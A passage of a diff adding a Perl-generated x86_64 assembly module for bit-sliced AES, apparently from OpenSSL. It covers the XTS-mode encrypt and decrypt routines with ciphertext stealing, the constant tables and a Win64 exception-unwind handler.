+	pcmpgtd	@XMM[7], $twtmp
+	pshufd	\$0x13, $twtmp, $twres
+	pxor	$twtmp, $twtmp
+	paddq	@XMM[7], @XMM[7]	# psllq	1,$tweak
+	pand	$twmask, $twres		# isolate carry and residue
+	pcmpgtd	@XMM[7], $twtmp		# broadcast upper bits
+	pxor	$twres, @XMM[7]
+
+	sub	\$0x80,$len
+	jnc	.Lxts_enc_loop
+
+.Lxts_enc_short:
+	add	\$0x80, $len
+	jz	.Lxts_enc_done
+___
+    for ($i=0;$i<7;$i++) {
+    $code.=<<___;
+	pshufd	\$0x13, $twtmp, $twres
+	pxor	$twtmp, $twtmp
+	movdqa	@XMM[7], @XMM[$i]
+	movdqa	@XMM[7], `0x10*$i`(%rsp)# save tweak[$i]
+	paddq	@XMM[7], @XMM[7]	# psllq	1,$tweak
+	pand	$twmask, $twres		# isolate carry and residue
+	pcmpgtd	@XMM[7], $twtmp		# broadcast upper bits
+	pxor	$twres, @XMM[7]
+___
+    $code.=<<___ if ($i>=1);
+	movdqu	`0x10*($i-1)`($inp), @XMM[8+$i-1]
+	cmp	\$`0x10*$i`,$len
+	je	.Lxts_enc_$i
+___
+    $code.=<<___ if ($i>=2);
+	pxor	@XMM[8+$i-2], @XMM[$i-2]# input[] ^ tweak[]
+___
+    }
+$code.=<<___;
+	movdqu	0x60($inp), @XMM[8+6]
+	pxor	@XMM[8+5], @XMM[5]
+	movdqa	@XMM[7], 0x70(%rsp)
+	lea	0x70($inp), $inp
+	pxor	@XMM[8+6], @XMM[6]
+	lea	0x80(%rsp), %rax	# pass key schedule
+	mov	%edx, %r10d		# pass rounds
+
+	call	_bsaes_encrypt8
+
+	pxor	0x00(%rsp), @XMM[0]	# ^= tweak[]
+	pxor	0x10(%rsp), @XMM[1]
+	movdqu	@XMM[0], 0x00($out)	# write output
+	pxor	0x20(%rsp), @XMM[4]
+	movdqu	@XMM[1], 0x10($out)
+	pxor	0x30(%rsp), @XMM[6]
+	movdqu	@XMM[4], 0x20($out)
+	pxor	0x40(%rsp), @XMM[3]
+	movdqu	@XMM[6], 0x30($out)
+	pxor	0x50(%rsp), @XMM[7]
+	movdqu	@XMM[3], 0x40($out)
+	pxor	0x60(%rsp), @XMM[2]
+	movdqu	@XMM[7], 0x50($out)
+	movdqu	@XMM[2], 0x60($out)
+	lea	0x70($out), $out
+
+	movdqa	0x70(%rsp), @XMM[7]	# next iteration tweak
+	jmp	.Lxts_enc_done
+.align	16
+.Lxts_enc_6:
+	pxor	@XMM[8+4], @XMM[4]
+	lea	0x60($inp), $inp
+	pxor	@XMM[8+5], @XMM[5]
+	lea	0x80(%rsp), %rax	# pass key schedule
+	mov	%edx, %r10d		# pass rounds
+
+	call	_bsaes_encrypt8
+
+	pxor	0x00(%rsp), @XMM[0]	# ^= tweak[]
+	pxor	0x10(%rsp), @XMM[1]
+	movdqu	@XMM[0], 0x00($out)	# write output
+	pxor	0x20(%rsp), @XMM[4]
+	movdqu	@XMM[1], 0x10($out)
+	pxor	0x30(%rsp), @XMM[6]
+	movdqu	@XMM[4], 0x20($out)
+	pxor	0x40(%rsp), @XMM[3]
+	movdqu	@XMM[6], 0x30($out)
+	pxor	0x50(%rsp), @XMM[7]
+	movdqu	@XMM[3], 0x40($out)
+	movdqu	@XMM[7], 0x50($out)
+	lea	0x60($out), $out
+
+	movdqa	0x60(%rsp), @XMM[7]	# next iteration tweak
+	jmp	.Lxts_enc_done
+.align	16
+.Lxts_enc_5:
+	pxor	@XMM[8+3], @XMM[3]
+	lea	0x50($inp), $inp
+	pxor	@XMM[8+4], @XMM[4]
+	lea	0x80(%rsp), %rax	# pass key schedule
+	mov	%edx, %r10d		# pass rounds
+
+	call	_bsaes_encrypt8
+
+	pxor	0x00(%rsp), @XMM[0]	# ^= tweak[]
+	pxor	0x10(%rsp), @XMM[1]
+	movdqu	@XMM[0], 0x00($out)	# write output
+	pxor	0x20(%rsp), @XMM[4]
+	movdqu	@XMM[1], 0x10($out)
+	pxor	0x30(%rsp), @XMM[6]
+	movdqu	@XMM[4], 0x20($out)
+	pxor	0x40(%rsp), @XMM[3]
+	movdqu	@XMM[6], 0x30($out)
+	movdqu	@XMM[3], 0x40($out)
+	lea	0x50($out), $out
+
+	movdqa	0x50(%rsp), @XMM[7]	# next iteration tweak
+	jmp	.Lxts_enc_done
+.align	16
+.Lxts_enc_4:
+	pxor	@XMM[8+2], @XMM[2]
+	lea	0x40($inp), $inp
+	pxor	@XMM[8+3], @XMM[3]
+	lea	0x80(%rsp), %rax	# pass key schedule
+	mov	%edx, %r10d		# pass rounds
+
+	call	_bsaes_encrypt8
+
+	pxor	0x00(%rsp), @XMM[0]	# ^= tweak[]
+	pxor	0x10(%rsp), @XMM[1]
+	movdqu	@XMM[0], 0x00($out)	# write output
+	pxor	0x20(%rsp), @XMM[4]
+	movdqu	@XMM[1], 0x10($out)
+	pxor	0x30(%rsp), @XMM[6]
+	movdqu	@XMM[4], 0x20($out)
+	movdqu	@XMM[6], 0x30($out)
+	lea	0x40($out), $out
+
+	movdqa	0x40(%rsp), @XMM[7]	# next iteration tweak
+	jmp	.Lxts_enc_done
+.align	16
+.Lxts_enc_3:
+	pxor	@XMM[8+1], @XMM[1]
+	lea	0x30($inp), $inp
+	pxor	@XMM[8+2], @XMM[2]
+	lea	0x80(%rsp), %rax	# pass key schedule
+	mov	%edx, %r10d		# pass rounds
+
+	call	_bsaes_encrypt8
+
+	pxor	0x00(%rsp), @XMM[0]	# ^= tweak[]
+	pxor	0x10(%rsp), @XMM[1]
+	movdqu	@XMM[0], 0x00($out)	# write output
+	pxor	0x20(%rsp), @XMM[4]
+	movdqu	@XMM[1], 0x10($out)
+	movdqu	@XMM[4], 0x20($out)
+	lea	0x30($out), $out
+
+	movdqa	0x30(%rsp), @XMM[7]	# next iteration tweak
+	jmp	.Lxts_enc_done
+.align	16
+.Lxts_enc_2:
+	pxor	@XMM[8+0], @XMM[0]
+	lea	0x20($inp), $inp
+	pxor	@XMM[8+1], @XMM[1]
+	lea	0x80(%rsp), %rax	# pass key schedule
+	mov	%edx, %r10d		# pass rounds
+
+	call	_bsaes_encrypt8
+
+	pxor	0x00(%rsp), @XMM[0]	# ^= tweak[]
+	pxor	0x10(%rsp), @XMM[1]
+	movdqu	@XMM[0], 0x00($out)	# write output
+	movdqu	@XMM[1], 0x10($out)
+	lea	0x20($out), $out
+
+	movdqa	0x20(%rsp), @XMM[7]	# next iteration tweak
+	jmp	.Lxts_enc_done
+.align	16
+.Lxts_enc_1:
+	pxor	@XMM[0], @XMM[8]
+	lea	0x10($inp), $inp
+	movdqa	@XMM[8], 0x20(%rbp)
+	lea	0x20(%rbp), $arg1
+	lea	0x20(%rbp), $arg2
+	lea	($key), $arg3
+	call	asm_AES_encrypt		# doesn't touch %xmm
+	pxor	0x20(%rbp), @XMM[0]	# ^= tweak[]
+	#pxor	@XMM[8], @XMM[0]
+	#lea	0x80(%rsp), %rax	# pass key schedule
+	#mov	%edx, %r10d		# pass rounds
+	#call	_bsaes_encrypt8
+	#pxor	0x00(%rsp), @XMM[0]	# ^= tweak[]
+	movdqu	@XMM[0], 0x00($out)	# write output
+	lea	0x10($out), $out
+
+	movdqa	0x10(%rsp), @XMM[7]	# next iteration tweak
+
+.Lxts_enc_done:
+	and	\$15, %ebx
+	jz	.Lxts_enc_ret
+	mov	$out, %rdx
+
+.Lxts_enc_steal:
+	movzb	($inp), %eax
+	movzb	-16(%rdx), %ecx
+	lea	1($inp), $inp
+	mov	%al, -16(%rdx)
+	mov	%cl, 0(%rdx)
+	lea	1(%rdx), %rdx
+	sub	\$1,%ebx
+	jnz	.Lxts_enc_steal
+
+	movdqu	-16($out), @XMM[0]
+	lea	0x20(%rbp), $arg1
+	pxor	@XMM[7], @XMM[0]
+	lea	0x20(%rbp), $arg2
+	movdqa	@XMM[0], 0x20(%rbp)
+	lea	($key), $arg3
+	call	asm_AES_encrypt		# doesn't touch %xmm
+	pxor	0x20(%rbp), @XMM[7]
+	movdqu	@XMM[7], -16($out)
+
+.Lxts_enc_ret:
+	lea	(%rsp), %rax
+	pxor	%xmm0, %xmm0
+.Lxts_enc_bzero:			# wipe key schedule [if any]
+	movdqa	%xmm0, 0x00(%rax)
+	movdqa	%xmm0, 0x10(%rax)
+	lea	0x20(%rax), %rax
+	cmp	%rax, %rbp
+	ja	.Lxts_enc_bzero
+
+	lea	(%rbp),%rsp		# restore %rsp
+___
+$code.=<<___ if ($win64);
+	movaps	0x40(%rbp), %xmm6
+	movaps	0x50(%rbp), %xmm7
+	movaps	0x60(%rbp), %xmm8
+	movaps	0x70(%rbp), %xmm9
+	movaps	0x80(%rbp), %xmm10
+	movaps	0x90(%rbp), %xmm11
+	movaps	0xa0(%rbp), %xmm12
+	movaps	0xb0(%rbp), %xmm13
+	movaps	0xc0(%rbp), %xmm14
+	movaps	0xd0(%rbp), %xmm15
+	lea	0xa0(%rbp), %rsp
+___
+$code.=<<___;
+	mov	0x48(%rsp), %r15
+	mov	0x50(%rsp), %r14
+	mov	0x58(%rsp), %r13
+	mov	0x60(%rsp), %r12
+	mov	0x68(%rsp), %rbx
+	mov	0x70(%rsp), %rax
+	lea	0x78(%rsp), %rsp
+	mov	%rax, %rbp
+.Lxts_enc_epilogue:
+	ret
+.size	bsaes_xts_encrypt,.-bsaes_xts_encrypt
+
+.globl	bsaes_xts_decrypt
+.type	bsaes_xts_decrypt,\@abi-omnipotent
+.align	16
+bsaes_xts_decrypt:
+	mov	%rsp, %rax
+.Lxts_dec_prologue:
+	push	%rbp
+	push	%rbx
+	push	%r12
+	push	%r13
+	push	%r14
+	push	%r15
+	lea	-0x48(%rsp), %rsp
+___
+$code.=<<___ if ($win64);
+	mov	0xa0(%rsp),$arg5	# pull key2
+	mov	0xa8(%rsp),$arg6	# pull ivp
+	lea	-0xa0(%rsp), %rsp
+	movaps	%xmm6, 0x40(%rsp)
+	movaps	%xmm7, 0x50(%rsp)
+	movaps	%xmm8, 0x60(%rsp)
+	movaps	%xmm9, 0x70(%rsp)
+	movaps	%xmm10, 0x80(%rsp)
+	movaps	%xmm11, 0x90(%rsp)
+	movaps	%xmm12, 0xa0(%rsp)
+	movaps	%xmm13, 0xb0(%rsp)
+	movaps	%xmm14, 0xc0(%rsp)
+	movaps	%xmm15, 0xd0(%rsp)
+.Lxts_dec_body:
+___
+$code.=<<___;
+	mov	%rsp, %rbp		# backup %rsp
+	mov	$arg1, $inp		# backup arguments
+	mov	$arg2, $out
+	mov	$arg3, $len
+	mov	$arg4, $key
+
+	lea	($arg6), $arg1
+	lea	0x20(%rbp), $arg2
+	lea	($arg5), $arg3
+	call	asm_AES_encrypt		# generate initial tweak
+
+	mov	240($key), %eax		# rounds
+	mov	$len, %rbx		# backup $len
+
+	mov	%eax, %edx		# rounds
+	shl	\$7, %rax		# 128 bytes per inner round key
+	sub	\$`128-32`, %rax	# size of bit-sliced key schedule
+	sub	%rax, %rsp
+
+	mov	%rsp, %rax		# pass key schedule
+	mov	$key, %rcx		# pass key
+	mov	%edx, %r10d		# pass rounds
+	call	_bsaes_key_convert
+	pxor	(%rsp), %xmm7		# fix up round 0 key
+	movdqa	%xmm6, (%rax)		# save last round key
+	movdqa	%xmm7, (%rsp)
+
+	xor	%eax, %eax		# if ($len%16) len-=16;
+	and	\$-16, $len
+	test	\$15, %ebx
+	setnz	%al
+	shl	\$4, %rax
+	sub	%rax, $len
+
+	sub	\$0x80, %rsp		# place for tweak[8]
+	movdqa	0x20(%rbp), @XMM[7]	# initial tweak
+
+	pxor	$twtmp, $twtmp
+	movdqa	.Lxts_magic(%rip), $twmask
+	pcmpgtd	@XMM[7], $twtmp		# broadcast upper bits
+
+	sub	\$0x80, $len
+	jc	.Lxts_dec_short
+	jmp	.Lxts_dec_loop
+
+.align	16
+.Lxts_dec_loop:
+___
+    for ($i=0;$i<7;$i++) {
+    $code.=<<___;
+	pshufd	\$0x13, $twtmp, $twres
+	pxor	$twtmp, $twtmp
+	movdqa	@XMM[7], @XMM[$i]
+	movdqa	@XMM[7], `0x10*$i`(%rsp)# save tweak[$i]
+	paddq	@XMM[7], @XMM[7]	# psllq	1,$tweak
+	pand	$twmask, $twres		# isolate carry and residue
+	pcmpgtd	@XMM[7], $twtmp		# broadcast upper bits
+	pxor	$twres, @XMM[7]
+___
+    $code.=<<___ if ($i>=1);
+	movdqu	`0x10*($i-1)`($inp), @XMM[8+$i-1]
+___
+    $code.=<<___ if ($i>=2);
+	pxor	@XMM[8+$i-2], @XMM[$i-2]# input[] ^ tweak[]
+___
+    }
+$code.=<<___;
+	movdqu	0x60($inp), @XMM[8+6]
+	pxor	@XMM[8+5], @XMM[5]
+	movdqu	0x70($inp), @XMM[8+7]
+	lea	0x80($inp), $inp
+	movdqa	@XMM[7], 0x70(%rsp)
+	pxor	@XMM[8+6], @XMM[6]
+	lea	0x80(%rsp), %rax	# pass key schedule
+	pxor	@XMM[8+7], @XMM[7]
+	mov	%edx, %r10d		# pass rounds
+
+	call	_bsaes_decrypt8
+
+	pxor	0x00(%rsp), @XMM[0]	# ^= tweak[]
+	pxor	0x10(%rsp), @XMM[1]
+	movdqu	@XMM[0], 0x00($out)	# write output
+	pxor	0x20(%rsp), @XMM[6]
+	movdqu	@XMM[1], 0x10($out)
+	pxor	0x30(%rsp), @XMM[4]
+	movdqu	@XMM[6], 0x20($out)
+	pxor	0x40(%rsp), @XMM[2]
+	movdqu	@XMM[4], 0x30($out)
+	pxor	0x50(%rsp), @XMM[7]
+	movdqu	@XMM[2], 0x40($out)
+	pxor	0x60(%rsp), @XMM[3]
+	movdqu	@XMM[7], 0x50($out)
+	pxor	0x70(%rsp), @XMM[5]
+	movdqu	@XMM[3], 0x60($out)
+	movdqu	@XMM[5], 0x70($out)
+	lea	0x80($out), $out
+
+	movdqa	0x70(%rsp), @XMM[7]	# prepare next iteration tweak
+	pxor	$twtmp, $twtmp
+	movdqa	.Lxts_magic(%rip), $twmask
+	pcmpgtd	@XMM[7], $twtmp
+	pshufd	\$0x13, $twtmp, $twres
+	pxor	$twtmp, $twtmp
+	paddq	@XMM[7], @XMM[7]	# psllq	1,$tweak
+	pand	$twmask, $twres		# isolate carry and residue
+	pcmpgtd	@XMM[7], $twtmp		# broadcast upper bits
+	pxor	$twres, @XMM[7]
+
+	sub	\$0x80,$len
+	jnc	.Lxts_dec_loop
+
+.Lxts_dec_short:
+	add	\$0x80, $len
+	jz	.Lxts_dec_done
+___
+    for ($i=0;$i<7;$i++) {
+    $code.=<<___;
+	pshufd	\$0x13, $twtmp, $twres
+	pxor	$twtmp, $twtmp
+	movdqa	@XMM[7], @XMM[$i]
+	movdqa	@XMM[7], `0x10*$i`(%rsp)# save tweak[$i]
+	paddq	@XMM[7], @XMM[7]	# psllq	1,$tweak
+	pand	$twmask, $twres		# isolate carry and residue
+	pcmpgtd	@XMM[7], $twtmp		# broadcast upper bits
+	pxor	$twres, @XMM[7]
+___
+    $code.=<<___ if ($i>=1);
+	movdqu	`0x10*($i-1)`($inp), @XMM[8+$i-1]
+	cmp	\$`0x10*$i`,$len
+	je	.Lxts_dec_$i
+___
+    $code.=<<___ if ($i>=2);
+	pxor	@XMM[8+$i-2], @XMM[$i-2]# input[] ^ tweak[]
+___
+    }
+$code.=<<___;
+	movdqu	0x60($inp), @XMM[8+6]
+	pxor	@XMM[8+5], @XMM[5]
+	movdqa	@XMM[7], 0x70(%rsp)
+	lea	0x70($inp), $inp
+	pxor	@XMM[8+6], @XMM[6]
+	lea	0x80(%rsp), %rax	# pass key schedule
+	mov	%edx, %r10d		# pass rounds
+
+	call	_bsaes_decrypt8
+
+	pxor	0x00(%rsp), @XMM[0]	# ^= tweak[]
+	pxor	0x10(%rsp), @XMM[1]
+	movdqu	@XMM[0], 0x00($out)	# write output
+	pxor	0x20(%rsp), @XMM[6]
+	movdqu	@XMM[1], 0x10($out)
+	pxor	0x30(%rsp), @XMM[4]
+	movdqu	@XMM[6], 0x20($out)
+	pxor	0x40(%rsp), @XMM[2]
+	movdqu	@XMM[4], 0x30($out)
+	pxor	0x50(%rsp), @XMM[7]
+	movdqu	@XMM[2], 0x40($out)
+	pxor	0x60(%rsp), @XMM[3]
+	movdqu	@XMM[7], 0x50($out)
+	movdqu	@XMM[3], 0x60($out)
+	lea	0x70($out), $out
+
+	movdqa	0x70(%rsp), @XMM[7]	# next iteration tweak
+	jmp	.Lxts_dec_done
+.align	16
+.Lxts_dec_6:
+	pxor	@XMM[8+4], @XMM[4]
+	lea	0x60($inp), $inp
+	pxor	@XMM[8+5], @XMM[5]
+	lea	0x80(%rsp), %rax	# pass key schedule
+	mov	%edx, %r10d		# pass rounds
+
+	call	_bsaes_decrypt8
+
+	pxor	0x00(%rsp), @XMM[0]	# ^= tweak[]
+	pxor	0x10(%rsp), @XMM[1]
+	movdqu	@XMM[0], 0x00($out)	# write output
+	pxor	0x20(%rsp), @XMM[6]
+	movdqu	@XMM[1], 0x10($out)
+	pxor	0x30(%rsp), @XMM[4]
+	movdqu	@XMM[6], 0x20($out)
+	pxor	0x40(%rsp), @XMM[2]
+	movdqu	@XMM[4], 0x30($out)
+	pxor	0x50(%rsp), @XMM[7]
+	movdqu	@XMM[2], 0x40($out)
+	movdqu	@XMM[7], 0x50($out)
+	lea	0x60($out), $out
+
+	movdqa	0x60(%rsp), @XMM[7]	# next iteration tweak
+	jmp	.Lxts_dec_done
+.align	16
+.Lxts_dec_5:
+	pxor	@XMM[8+3], @XMM[3]
+	lea	0x50($inp), $inp
+	pxor	@XMM[8+4], @XMM[4]
+	lea	0x80(%rsp), %rax	# pass key schedule
+	mov	%edx, %r10d		# pass rounds
+
+	call	_bsaes_decrypt8
+
+	pxor	0x00(%rsp), @XMM[0]	# ^= tweak[]
+	pxor	0x10(%rsp), @XMM[1]
+	movdqu	@XMM[0], 0x00($out)	# write output
+	pxor	0x20(%rsp), @XMM[6]
+	movdqu	@XMM[1], 0x10($out)
+	pxor	0x30(%rsp), @XMM[4]
+	movdqu	@XMM[6], 0x20($out)
+	pxor	0x40(%rsp), @XMM[2]
+	movdqu	@XMM[4], 0x30($out)
+	movdqu	@XMM[2], 0x40($out)
+	lea	0x50($out), $out
+
+	movdqa	0x50(%rsp), @XMM[7]	# next iteration tweak
+	jmp	.Lxts_dec_done
+.align	16
+.Lxts_dec_4:
+	pxor	@XMM[8+2], @XMM[2]
+	lea	0x40($inp), $inp
+	pxor	@XMM[8+3], @XMM[3]
+	lea	0x80(%rsp), %rax	# pass key schedule
+	mov	%edx, %r10d		# pass rounds
+
+	call	_bsaes_decrypt8
+
+	pxor	0x00(%rsp), @XMM[0]	# ^= tweak[]
+	pxor	0x10(%rsp), @XMM[1]
+	movdqu	@XMM[0], 0x00($out)	# write output
+	pxor	0x20(%rsp), @XMM[6]
+	movdqu	@XMM[1], 0x10($out)
+	pxor	0x30(%rsp), @XMM[4]
+	movdqu	@XMM[6], 0x20($out)
+	movdqu	@XMM[4], 0x30($out)
+	lea	0x40($out), $out
+
+	movdqa	0x40(%rsp), @XMM[7]	# next iteration tweak
+	jmp	.Lxts_dec_done
+.align	16
+.Lxts_dec_3:
+	pxor	@XMM[8+1], @XMM[1]
+	lea	0x30($inp), $inp
+	pxor	@XMM[8+2], @XMM[2]
+	lea	0x80(%rsp), %rax	# pass key schedule
+	mov	%edx, %r10d		# pass rounds
+
+	call	_bsaes_decrypt8
+
+	pxor	0x00(%rsp), @XMM[0]	# ^= tweak[]
+	pxor	0x10(%rsp), @XMM[1]
+	movdqu	@XMM[0], 0x00($out)	# write output
+	pxor	0x20(%rsp), @XMM[6]
+	movdqu	@XMM[1], 0x10($out)
+	movdqu	@XMM[6], 0x20($out)
+	lea	0x30($out), $out
+
+	movdqa	0x30(%rsp), @XMM[7]	# next iteration tweak
+	jmp	.Lxts_dec_done
+.align	16
+.Lxts_dec_2:
+	pxor	@XMM[8+0], @XMM[0]
+	lea	0x20($inp), $inp
+	pxor	@XMM[8+1], @XMM[1]
+	lea	0x80(%rsp), %rax	# pass key schedule
+	mov	%edx, %r10d		# pass rounds
+
+	call	_bsaes_decrypt8
+
+	pxor	0x00(%rsp), @XMM[0]	# ^= tweak[]
+	pxor	0x10(%rsp), @XMM[1]
+	movdqu	@XMM[0], 0x00($out)	# write output
+	movdqu	@XMM[1], 0x10($out)
+	lea	0x20($out), $out
+
+	movdqa	0x20(%rsp), @XMM[7]	# next iteration tweak
+	jmp	.Lxts_dec_done
+.align	16
+.Lxts_dec_1:
+	pxor	@XMM[0], @XMM[8]
+	lea	0x10($inp), $inp
+	movdqa	@XMM[8], 0x20(%rbp)
+	lea	0x20(%rbp), $arg1
+	lea	0x20(%rbp), $arg2
+	lea	($key), $arg3
+	call	asm_AES_decrypt		# doesn't touch %xmm
+	pxor	0x20(%rbp), @XMM[0]	# ^= tweak[]
+	#pxor	@XMM[8], @XMM[0]
+	#lea	0x80(%rsp), %rax	# pass key schedule
+	#mov	%edx, %r10d		# pass rounds
+	#call	_bsaes_decrypt8
+	#pxor	0x00(%rsp), @XMM[0]	# ^= tweak[]
+	movdqu	@XMM[0], 0x00($out)	# write output
+	lea	0x10($out), $out
+
+	movdqa	0x10(%rsp), @XMM[7]	# next iteration tweak
+
+.Lxts_dec_done:
+	and	\$15, %ebx
+	jz	.Lxts_dec_ret
+
+	pxor	$twtmp, $twtmp
+	movdqa	.Lxts_magic(%rip), $twmask
+	pcmpgtd	@XMM[7], $twtmp
+	pshufd	\$0x13, $twtmp, $twres
+	movdqa	@XMM[7], @XMM[6]
+	paddq	@XMM[7], @XMM[7]	# psllq 1,$tweak
+	pand	$twmask, $twres		# isolate carry and residue
+	movdqu	($inp), @XMM[0]
+	pxor	$twres, @XMM[7]
+
+	lea	0x20(%rbp), $arg1
+	pxor	@XMM[7], @XMM[0]
+	lea	0x20(%rbp), $arg2
+	movdqa	@XMM[0], 0x20(%rbp)
+	lea	($key), $arg3
+	call	asm_AES_decrypt		# doesn't touch %xmm
+	pxor	0x20(%rbp), @XMM[7]
+	mov	$out, %rdx
+	movdqu	@XMM[7], ($out)
+
+.Lxts_dec_steal:
+	movzb	16($inp), %eax
+	movzb	(%rdx), %ecx
+	lea	1($inp), $inp
+	mov	%al, (%rdx)
+	mov	%cl, 16(%rdx)
+	lea	1(%rdx), %rdx
+	sub	\$1,%ebx
+	jnz	.Lxts_dec_steal
+
+	movdqu	($out), @XMM[0]
+	lea	0x20(%rbp), $arg1
+	pxor	@XMM[6], @XMM[0]
+	lea	0x20(%rbp), $arg2
+	movdqa	@XMM[0], 0x20(%rbp)
+	lea	($key), $arg3
+	call	asm_AES_decrypt		# doesn't touch %xmm
+	pxor	0x20(%rbp), @XMM[6]
+	movdqu	@XMM[6], ($out)
+
+.Lxts_dec_ret:
+	lea	(%rsp), %rax
+	pxor	%xmm0, %xmm0
+.Lxts_dec_bzero:			# wipe key schedule [if any]
+	movdqa	%xmm0, 0x00(%rax)
+	movdqa	%xmm0, 0x10(%rax)
+	lea	0x20(%rax), %rax
+	cmp	%rax, %rbp
+	ja	.Lxts_dec_bzero
+
+	lea	(%rbp),%rsp		# restore %rsp
+___
+$code.=<<___ if ($win64);
+	movaps	0x40(%rbp), %xmm6
+	movaps	0x50(%rbp), %xmm7
+	movaps	0x60(%rbp), %xmm8
+	movaps	0x70(%rbp), %xmm9
+	movaps	0x80(%rbp), %xmm10
+	movaps	0x90(%rbp), %xmm11
+	movaps	0xa0(%rbp), %xmm12
+	movaps	0xb0(%rbp), %xmm13
+	movaps	0xc0(%rbp), %xmm14
+	movaps	0xd0(%rbp), %xmm15
+	lea	0xa0(%rbp), %rsp
+___
+$code.=<<___;
+	mov	0x48(%rsp), %r15
+	mov	0x50(%rsp), %r14
+	mov	0x58(%rsp), %r13
+	mov	0x60(%rsp), %r12
+	mov	0x68(%rsp), %rbx
+	mov	0x70(%rsp), %rax
+	lea	0x78(%rsp), %rsp
+	mov	%rax, %rbp
+.Lxts_dec_epilogue:
+	ret
+.size	bsaes_xts_decrypt,.-bsaes_xts_decrypt
+___
+}
+$code.=<<___;
+.type	_bsaes_const,\@object
+.align	64
+_bsaes_const:
+.LM0ISR:	# InvShiftRows constants
+	.quad	0x0a0e0206070b0f03, 0x0004080c0d010509
+.LISRM0:
+	.quad	0x01040b0e0205080f, 0x0306090c00070a0d
+.LISR:
+	.quad	0x0504070602010003, 0x0f0e0d0c080b0a09
+.LBS0:		# bit-slice constants
+	.quad	0x5555555555555555, 0x5555555555555555
+.LBS1:
+	.quad	0x3333333333333333, 0x3333333333333333
+.LBS2:
+	.quad	0x0f0f0f0f0f0f0f0f, 0x0f0f0f0f0f0f0f0f
+.LSR:		# shiftrows constants
+	.quad	0x0504070600030201, 0x0f0e0d0c0a09080b
+.LSRM0:
+	.quad	0x0304090e00050a0f, 0x01060b0c0207080d
+.LM0SR:
+	.quad	0x0a0e02060f03070b, 0x0004080c05090d01
+.LSWPUP:	# byte-swap upper dword
+	.quad	0x0706050403020100, 0x0c0d0e0f0b0a0908
+.LSWPUPM0SR:
+	.quad	0x0a0d02060c03070b, 0x0004080f05090e01
+.LADD1:		# counter increment constants
+	.quad	0x0000000000000000, 0x0000000100000000
+.LADD2:
+	.quad	0x0000000000000000, 0x0000000200000000
+.LADD3:
+	.quad	0x0000000000000000, 0x0000000300000000
+.LADD4:
+	.quad	0x0000000000000000, 0x0000000400000000
+.LADD5:
+	.quad	0x0000000000000000, 0x0000000500000000
+.LADD6:
+	.quad	0x0000000000000000, 0x0000000600000000
+.LADD7:
+	.quad	0x0000000000000000, 0x0000000700000000
+.LADD8:
+	.quad	0x0000000000000000, 0x0000000800000000
+.Lxts_magic:
+	.long	0x87,0,1,0
+.Lmasks:
+	.quad	0x0101010101010101, 0x0101010101010101
+	.quad	0x0202020202020202, 0x0202020202020202
+	.quad	0x0404040404040404, 0x0404040404040404
+	.quad	0x0808080808080808, 0x0808080808080808
+.LM0:
+	.quad	0x02060a0e03070b0f, 0x0004080c0105090d
+.L63:
+	.quad	0x6363636363636363, 0x6363636363636363
+.asciz	"Bit-sliced AES for x86_64/SSSE3, Emilia Käsper, Peter Schwabe, Andy Polyakov"
+.align	64
+.size	_bsaes_const,.-_bsaes_const
+___
+
+# EXCEPTION_DISPOSITION handler (EXCEPTION_RECORD *rec,ULONG64 frame,
+#		CONTEXT *context,DISPATCHER_CONTEXT *disp)
+if ($win64) {
+$rec="%rcx";
+$frame="%rdx";
+$context="%r8";
+$disp="%r9";
+
+$code.=<<___;
+.extern	__imp_RtlVirtualUnwind
+.type	se_handler,\@abi-omnipotent
+.align	16
+se_handler:
+	push	%rsi
+	push	%rdi
+	push	%rbx
+	push	%rbp
+	push	%r12
+	push	%r13
+	push	%r14
+	push	%r15
+	pushfq
+	sub	\$64,%rsp
+
+	mov	120($context),%rax	# pull context->Rax
+	mov	248($context),%rbx	# pull context->Rip
+
+	mov	8($disp),%rsi		# disp->ImageBase
+	mov	56($disp),%r11		# disp->HandlerData
+
+	mov	0(%r11),%r10d		# HandlerData[0]
+	lea	(%rsi,%r10),%r10	# prologue label
+	cmp	%r10,%rbx		# context->Rip<prologue label
+	jb	.Lin_prologue
+
+	mov	152($context),%rax	# pull context->Rsp
+
+	mov	4(%r11),%r10d		# HandlerData[1]
+	lea	(%rsi,%r10),%r10	# epilogue label
+	cmp	%r10,%rbx		# context->Rip>=epilogue label
+	jae	.Lin_prologue
+
+	mov	160($context),%rax	# pull context->Rbp
+
+	lea	0x40(%rax),%rsi		# %xmm save area
+	lea	512($context),%rdi	# &context.Xmm6
+	mov	\$20,%ecx		# 10*sizeof(%xmm0)/sizeof(%rax)
+	.long	0xa548f3fc		# cld; rep movsq
+	lea	0xa0(%rax),%rax		# adjust stack pointer
+
+	mov	0x70(%rax),%rbp
+	mov	0x68(%rax),%rbx
+	mov	0x60(%rax),%r12
+	mov	0x58(%rax),%r13
+	mov	0x50(%rax),%r14
+	mov	0x48(%rax),%r15
+	lea	0x78(%rax),%rax		# adjust stack pointer
+	mov	%rbx,144($context)	# restore context->Rbx
+	mov	%rbp,160($context)	# restore context->Rbp
+	mov	%r12,216($context)	# restore context->R12
+	mov	%r13,224($context)	# restore context->R13
+	mov	%r14,232($context)	# restore context->R14
+	mov	%r15,240($context)	# restore context->R15
+
+.Lin_prologue:
+	mov	%rax,152($context)	# restore context->Rsp
+
+	mov	40($disp),%rdi		# disp->ContextRecord
+	mov	$context,%rsi		# context
+	mov	\$`1232/8`,%ecx		# sizeof(CONTEXT)
+	.long	0xa548f3fc		# cld; rep movsq
+
+	mov	$disp,%rsi
+	xor	%rcx,%rcx		# arg1, UNW_FLAG_NHANDLER
+	mov	8(%rsi),%rdx		# arg2, disp->ImageBase
+	mov	0(%rsi),%r8		# arg3, disp->ControlPc
+	mov	16(%rsi),%r9		# arg4, disp->FunctionEntry
+	mov	40(%rsi),%r10		# disp->ContextRecord
+	lea	56(%rsi),%r11		# &disp->HandlerData
+	lea	24(%rsi),%r12		# &disp->EstablisherFrame
+	mov	%r10,32(%rsp)		# arg5
+	mov	%r11,40(%rsp)		# arg6
+	mov	%r12,48(%rsp)		# arg7
+	mov	%rcx,56(%rsp)		# arg8, (NULL)
+	call	*__imp_RtlVirtualUnwind(%rip)
+
+	mov	\$1,%eax		# ExceptionContinueSearch
+	add	\$64,%rsp
+	popfq
+	pop	%r15
+	pop	%r14
+	pop	%r13
+	pop	%r12
+	pop	%rbp
+	pop	%rbx
+	pop	%rdi
+	pop	%rsi
+	ret
+.size	se_handler,.-se_handler
+
+.section	.pdata
+.align	4
+___
+$code.=<<___ if ($ecb);
+	.rva	.Lecb_enc_prologue
+	.rva	.Lecb_enc_epilogue
